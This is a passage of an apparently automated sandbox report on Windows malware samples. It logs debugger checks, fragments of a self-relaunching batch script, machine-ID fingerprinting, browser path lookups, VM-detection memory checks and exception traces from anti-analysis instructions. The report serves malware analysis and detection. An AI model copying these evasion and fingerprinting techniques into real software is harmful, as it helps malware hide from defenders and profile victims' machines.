IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:47 p.m.			0	0

Command line console output was observed (50 out of 1530 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "" /min "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: /b console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "any_word" == "" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "" /min "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: /b console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: chcp console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: Color console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: 0f console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "Arch=" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "ArgNsudo=" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "MainFolder1=" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "MainFolder2=" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "ProcList=" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "NumberWin=" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: SetLocal console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: EnableDelayedExpansion console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: cd console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: /d "C:\Users\test22\AppData\Local\Temp\Work" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\Work> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "Arch=x64" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: If console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: "x86" == "x86" console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: not console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: defined PROCESSOR_ARCHITEW6432 console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: Arch=x86 console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\Work> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: reg console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	c:\program files\mozilla firefox\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 4, 2025, 12:38 p.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 1117 events)

Time & API	Arguments	Status
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1b9873 @ 0xfa9873 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734412 registers.edi: 16400524 registers.eax: 0 registers.ebp: 3734440 registers.edx: 0 registers.ebx: 12989360 registers.esi: 6 registers.ecx: 12989360	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1b9873 @ 0xfa9873 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734412 registers.edi: 3734412 registers.eax: 0 registers.ebp: 3734440 registers.edx: 2 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734620	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1b9873 @ 0xfa9873 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734412 registers.edi: 3734412 registers.eax: 0 registers.ebp: 3734440 registers.edx: 2 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734620	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcc64 @ 0xfacc64 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 16400524 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 10870784 registers.esi: 15065088 registers.ecx: 15065088	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcc64 @ 0xfacc64 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcc64 @ 0xfacc64 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcc64 @ 0xfacc64 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcd40 @ 0xfacd40 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 16400524 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 10870784 registers.esi: 15065088 registers.ecx: 3446298575	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcd40 @ 0xfacd40 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcd40 @ 0xfacd40 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcd40 @ 0xfacd40 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcd40 @ 0xfacd40 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bce12 @ 0xface12 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 16400524 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 10870784 registers.esi: 15065088 registers.ecx: 3734392	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bce12 @ 0xface12 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bce12 @ 0xface12 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcf0c @ 0xfacf0c 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 16400524 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 10870784 registers.esi: 15065088 registers.ecx: 0	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcf0c @ 0xfacf0c 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcf0c @ 0xfacf0c 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcfa2 @ 0xfacfa2 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 16400524 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 10870784 registers.esi: 15065088 registers.ecx: 3849650670	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcfa2 @ 0xfacfa2 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcfa2 @ 0xfacfa2 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcfa2 @ 0xfacfa2 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x1241d9 exception.instruction: div eax exception.module: 1z90E9.exe exception.exception_code: 0xc0000094 exception.offset: 1196505 exception.address: 0xf141d9 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 0 registers.ebx: 15811098 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: 1z90e9+0x1bcfa2 @ 0xfacfa2 1z90e9+0x1c0029 @ 0xfb0029 1z90e9+0x1478dc @ 0xf378dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 1z90e9+0x124204 exception.instruction: ud2 exception.module: 1z90E9.exe exception.exception_code: 0xc000001d exception.offset: 1196548 exception.address: 0xf14204 registers.esp: 3734364 registers.edi: 3734364 registers.eax: 0 registers.ebp: 3734392 registers.edx: 2 registers.ebx: 15811055 registers.esi: 0 registers.ecx: 3734400	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: 3v57i+0x2f80b9 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 3113145 exception.address: 0xc180b9 registers.esp: 1571448 registers.edi: 0 registers.eax: 1 registers.ebp: 1571464 registers.edx: 14344192 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 b9 f5 ff ff 50 e9 00 00 00 00 f7 14 24 58 exception.symbol: 3v57i+0x61804 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 399364 exception.address: 0x981804 registers.esp: 1571412 registers.edi: 1968898280 registers.eax: 27934 registers.ebp: 3999985684 registers.edx: 9568256 registers.ebx: 9964958 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 e9 44 f7 ff ff 52 ba 84 74 exception.symbol: 3v57i+0x6176f exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 399215 exception.address: 0x98176f registers.esp: 1571416 registers.edi: 1968898280 registers.eax: 27934 registers.ebp: 3999985684 registers.edx: 4294942468 registers.ebx: 9992892 registers.esi: 2298801283 registers.ecx: 1969094656	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 81 c2 46 02 75 7e 81 c2 91 db f7 7a e9 73 02 exception.symbol: 3v57i+0x61c7f exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 400511 exception.address: 0x981c7f registers.esp: 1571412 registers.edi: 1968898280 registers.eax: 32323 registers.ebp: 3999985684 registers.edx: 9968520 registers.ebx: 1960838688 registers.esi: 2298801283 registers.ecx: 1969094656	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 50 01 00 00 81 04 24 04 00 00 00 e9 48 ff exception.symbol: 3v57i+0x61e3c exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 400956 exception.address: 0x981e3c registers.esp: 1571416 registers.edi: 0 registers.eax: 239849 registers.ebp: 3999985684 registers.edx: 9971279 registers.ebx: 1960838688 registers.esi: 2298801283 registers.ecx: 1969094656	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 81 ef c6 5f 4b 3f 50 b8 db 8b fa 7a e9 7d 05 exception.symbol: 3v57i+0x1d4fca exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1920970 exception.address: 0xaf4fca registers.esp: 1571412 registers.edi: 11489161 registers.eax: 25860 registers.ebp: 3999985684 registers.edx: 2130566132 registers.ebx: 7143533 registers.esi: 11473199 registers.ecx: 109	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 bc 00 00 00 53 52 ba 40 d3 1d 7e bb 5e ac exception.symbol: 3v57i+0x1d53c9 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1921993 exception.address: 0xaf53c9 registers.esp: 1571416 registers.edi: 11515021 registers.eax: 25860 registers.ebp: 3999985684 registers.edx: 2130566132 registers.ebx: 7143533 registers.esi: 11473199 registers.ecx: 109	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 b9 11 b9 af 56 51 exception.symbol: 3v57i+0x1d519d exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1921437 exception.address: 0xaf519d registers.esp: 1571416 registers.edi: 11515021 registers.eax: 4294944296 registers.ebp: 3999985684 registers.edx: 2130566132 registers.ebx: 7143533 registers.esi: 11473199 registers.ecx: 77545	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 83 fe ff ff 89 14 24 68 aa 83 fc 7e 5a 31 exception.symbol: 3v57i+0x1d79b6 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1931702 exception.address: 0xaf79b6 registers.esp: 1571412 registers.edi: 11499409 registers.eax: 30984 registers.ebp: 3999985684 registers.edx: 1585 registers.ebx: 11495093 registers.esi: 0 registers.ecx: 46461	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 50 89 e0 05 04 00 00 00 2d 04 00 00 00 87 04 exception.symbol: 3v57i+0x1d8172 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1933682 exception.address: 0xaf8172 registers.esp: 1571416 registers.edi: 11530393 registers.eax: 30984 registers.ebp: 3999985684 registers.edx: 1585 registers.ebx: 11495093 registers.esi: 0 registers.ecx: 46461	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 50 b8 f5 49 df 7a bb e7 f1 6a 00 31 c3 e9 6d exception.symbol: 3v57i+0x1d7c67 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1932391 exception.address: 0xaf7c67 registers.esp: 1571416 registers.edi: 11502377 registers.eax: 1259 registers.ebp: 3999985684 registers.edx: 1585 registers.ebx: 11495093 registers.esi: 0 registers.ecx: 46461	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 3d 02 00 00 b8 00 9f db 7d 89 c7 58 55 bd exception.symbol: 3v57i+0x1de9ff exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1960447 exception.address: 0xafe9ff registers.esp: 1571412 registers.edi: 4468431 registers.eax: 31982 registers.ebp: 3999985684 registers.edx: 11528144 registers.ebx: 1154559341 registers.esi: 0 registers.ecx: 14288	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 e9 00 00 00 00 89 1c 24 e9 exception.symbol: 3v57i+0x1df0c9 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1962185 exception.address: 0xaff0c9 registers.esp: 1571416 registers.edi: 1114345 registers.eax: 31982 registers.ebp: 3999985684 registers.edx: 11560126 registers.ebx: 1154559341 registers.esi: 4294937736 registers.ecx: 14288	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 56 89 14 24 50 89 24 24 exception.symbol: 3v57i+0x1e4cc4 exception.instruction: in eax, dx exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1985732 exception.address: 0xb04cc4 registers.esp: 1571408 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 3999985684 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 11534730 registers.ecx: 20	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: 3v57i+0x1e3a1c exception.address: 0xb03a1c exception.module: 3v57I.exe exception.exception_code: 0xc000001d exception.offset: 1980956 registers.esp: 1571408 registers.edi: 1114345 registers.eax: 1 registers.ebp: 3999985684 registers.edx: 22104 registers.ebx: 0 registers.esi: 11534730 registers.ecx: 20	1
